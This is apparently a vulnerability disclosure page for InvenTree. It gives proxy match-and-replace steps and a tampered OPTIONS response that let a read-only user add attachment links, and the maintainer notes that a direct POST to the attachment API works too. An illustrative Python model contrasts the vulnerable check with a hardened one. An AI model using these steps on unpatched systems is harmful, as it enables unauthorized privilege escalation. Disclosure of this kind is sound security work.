Privilege Escalation via edit response body in inventree/inventree

Valid

Reported on

Jun 17th 2022


Description

Recently, I found a business logic vulnerability, and this vulnerability allows a reader user to perform privilege escalation to an allaccess user. Before a user performs any function, the client side performs an OPTIONS request to view the user's permission for the specified function via the response body. If the attacker can manipulate the response body, the attacker can modify this response body and access sensitive functions.

Steps to reproduce

1 - The reader user cannot perform the Add Link function.


2 - In Burp Suite, go to Proxy > Options > Match and Replace, and click Add.

Replace "actions":{"GET":true} with "actions":{"POST":{"pk":{"type":"integer","required":true,"read_only":true,"label":"ID"},"build":{"type":"related field","required":true,"read_only":false,"label":"Build","model":"build","api_url":"/api/build/","filters":{},"help_text":""},"attachment":{"type":"file upload","required":true,"read_only":false,"label":"Attachment","help_text":"Select file to attach"},"link":{"type":"url","required":false,"read_only":false,"label":"Link","help_text":"Link to external URL","max_length":200},"filename":{"type":"string","required":true,"read_only":false,"label":"Filename"},"comment":{"type":"string","required":false,"read_only":false,"label":"Comment","help_text":"File comment","max_length":100},"upload_date":{"type":"date","required":true,"read_only":true,"label":"Upload date","help_text":""},"user":{"type":"related field","required":false,"read_only":false,"label":"User","help_text":"User","model":"user","api_url":"/api/user/","filters":{}},"user_detail":{"type":"nested object","required":true,"read_only":true,"label":"User detail","children":{"pk":{"type":"integer","required":true,"read_only":true,"label":"ID"},"username":{"type":"string","required":true,"read_only":false,"label":"Username","help_text":"Required. 150 characters or fewer. Letters, digits and @/./+/-/_ only.","max_length":150},"first_name":{"type":"string","required":false,"read_only":false,"label":"First name","max_length":150,"help_text":""},"last_name":{"type":"string","required":false,"read_only":false,"label":"Last name","max_length":150,"help_text":""},"email":{"type":"email","required":false,"read_only":false,"label":"Email address","max_length":254,"help_text":""}}}},"DELETE":true,"GET":true}

And click OK.

3 - Try the Add Link function again with the reader account, and it succeeds!


Impact

This vulnerability allows an attacker with low privilege to perform high-privilege actions and access sensitive functions.

We are processing your report and will contact the inventree team within 24 hours. a year ago
Nhien.IT modified the report
a year ago
Oliver modified the Severity from Critical (9.4) to Medium (6.5) a year ago
Oliver
a year ago

Maintainer


Thanks for reporting this. I have found that there is an even easier way to reproduce this:

Simply navigate to the appropriate API URL e.g. /api/part/attachment/ and an authenticated user who nominally cannot create or edit attachments can issue a POST request against this endpoint. No manipulation of front-end code is required.

We will have a fix out for this ASAP, thanks again for reporting.
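The maintainer's comment points at the real defect: the OPTIONS "actions" metadata only tells the front end which buttons to draw, and the server was not checking the user's permission on the POST itself. The following Python model is an added illustration, not InvenTree's own code; the role table, the `User`/`Response` types, the two view classes and the `simulate_tampered_client` helper are all assumptions made for this example. It contrasts a view that relies on the UI having hidden the form with one that enforces the same role table on every request, and shows that rewriting the OPTIONS response in a proxy (the Burp step in the report) changes nothing once the server does its own check.

```python
"""Added example: why OPTIONS metadata is not an authorization boundary.

Not InvenTree's code. Roles, view classes and the permission table are
assumptions constructed for illustration.
"""
from dataclasses import dataclass, field
from typing import Optional

# Constructed role table: which HTTP methods each role may use on the
# attachment endpoint. "reader" may only read; "allaccess" may do everything.
ROLE_METHODS = {
    "reader": {"GET", "OPTIONS"},
    "allaccess": {"GET", "OPTIONS", "POST", "DELETE"},
}


@dataclass
class User:
    name: str
    role: str


@dataclass
class Response:
    status: int
    body: dict = field(default_factory=dict)


def options_metadata(user: User) -> dict:
    """OPTIONS response describing which actions the UI should offer.

    This is UI metadata only: a client proxying its own traffic can rewrite it,
    so the server must never treat it as having enforced anything.
    """
    allowed = ROLE_METHODS.get(user.role, set())
    return {"actions": {m: True for m in ("GET", "POST", "DELETE") if m in allowed}}


class VulnerableAttachmentView:
    """Mirrors the reported flaw: POST assumes the UI already hid the form."""

    def dispatch(self, user: User, method: str, payload: Optional[dict] = None) -> Response:
        if method == "OPTIONS":
            return Response(200, options_metadata(user))
        if method == "GET":
            return Response(200, {"results": []})
        if method == "POST":
            # No server-side permission check: any authenticated user can create.
            return Response(201, {"created": payload})
        return Response(405)


class HardenedAttachmentView:
    """Checks the role table on every method, independent of OPTIONS output."""

    def has_permission(self, user: User, method: str) -> bool:
        return method in ROLE_METHODS.get(user.role, set())

    def dispatch(self, user: User, method: str, payload: Optional[dict] = None) -> Response:
        if not self.has_permission(user, method):
            # Denied before any handler runs; worth logging for detection.
            return Response(403, {"detail": "permission denied"})
        if method == "OPTIONS":
            return Response(200, options_metadata(user))
        if method == "GET":
            return Response(200, {"results": []})
        if method == "POST":
            return Response(201, {"created": payload})
        return Response(405)


def simulate_tampered_client(view, user: User, payload: dict) -> Response:
    """Model the proxy match-and-replace step from the report.

    The client rewrites its own copy of the OPTIONS response so the UI renders
    the Add Link form, then submits the POST. The server never sees the
    tampered metadata, so only the server's own check decides the outcome.
    """
    metadata = view.dispatch(user, "OPTIONS").body
    metadata["actions"]["POST"] = True  # attacker-controlled, client-side only
    if "POST" not in metadata["actions"]:
        raise RuntimeError("UI would not have rendered the form")
    return view.dispatch(user, "POST", payload)


if __name__ == "__main__":
    reader = User("reader", "reader")
    link = {"link": "https://example.invalid/doc"}  # constructed sample payload
    print("vulnerable:", simulate_tampered_client(VulnerableAttachmentView(), reader, link).status)  # 201
    print("hardened:  ", simulate_tampered_client(HardenedAttachmentView(), reader, link).status)    # 403
```

The design point is that `has_permission` runs before any handler for every method, so the OPTIONS response and the POST handler can never disagree about what a role may do. Operationally, a 403 on a write method from an account whose role should never issue one is a cheap, high-signal event to alert on.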

The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Oliver validated this vulnerability a year ago
Nhien.IT has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Oliver marked this as fixed in 0.8.0 with commit 12fccc a year ago
Oliver has been awarded the fix bounty
This vulnerability will not receive a CVE
Nhien.IT
a year ago

Researcher


Hi @maintainer,

any bounty for this vulnerability?

Nhien.IT
a year ago

Researcher


Hi @maintainer, the fix is already released. Can you assign a CVE here? If you can, I hope @admin can help.

Jamie Slome
a year ago

Admin


We can assign and publish a CVE with the permission of the @maintainer 👍
